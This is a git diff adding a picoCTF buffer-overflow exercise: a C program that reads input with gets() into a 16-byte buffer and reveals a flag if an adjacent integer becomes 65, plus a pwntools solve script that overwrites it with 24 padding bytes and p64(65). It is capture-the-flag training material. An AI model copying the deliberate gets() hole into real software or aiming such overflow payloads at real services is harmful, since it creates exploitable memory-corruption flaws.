diff --git a/pwn/local_target/local-target b/pwn/local_target/local-target
new file mode 100755
index 0000000..072f668
Binary files /dev/null and b/pwn/local_target/local-target differ
diff --git a/pwn/local_target/local-target.c b/pwn/local_target/local-target.c
new file mode 100644
index 0000000..f20ecdd
--- /dev/null
+++ b/pwn/local_target/local-target.c
@@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+
+
+int main(){
+  FILE *fptr;
+  char c;
+
+  char input[16];
+  int num = 64;
+  
+  printf("Enter a string: ");
+  fflush(stdout);
+  gets(input);
+  printf("\n");
+  
+  printf("num is %d\n", num);
+  fflush(stdout);
+  
+  if( num == 65 ){
+    printf("You win!\n");
+    fflush(stdout);
+    // Open file
+    fptr = fopen("flag.txt", "r");
+    if (fptr == NULL)
+    {
+        printf("Cannot open file.\n");
+        fflush(stdout);
+        exit(0);
+    }
+
+    // Read contents from file
+    c = fgetc(fptr);
+    while (c != EOF)
+    {
+        printf ("%c", c);
+        c = fgetc(fptr);
+    }
+    fflush(stdout);
+
+    printf("\n");
+    fflush(stdout);
+    fclose(fptr);
+    exit(0);
+  }
+  
+  printf("Bye!\n");
+  fflush(stdout);
+}
diff --git a/pwn/local_target/solve.py b/pwn/local_target/solve.py
new file mode 100755
index 0000000..8a32702
--- /dev/null
+++ b/pwn/local_target/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./local-target")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 58138".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  r.recvuntil(b"Enter a string: ")
+  offset = 24 # found with pwndbg
+  payload = b'A' * offset + p64(65)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file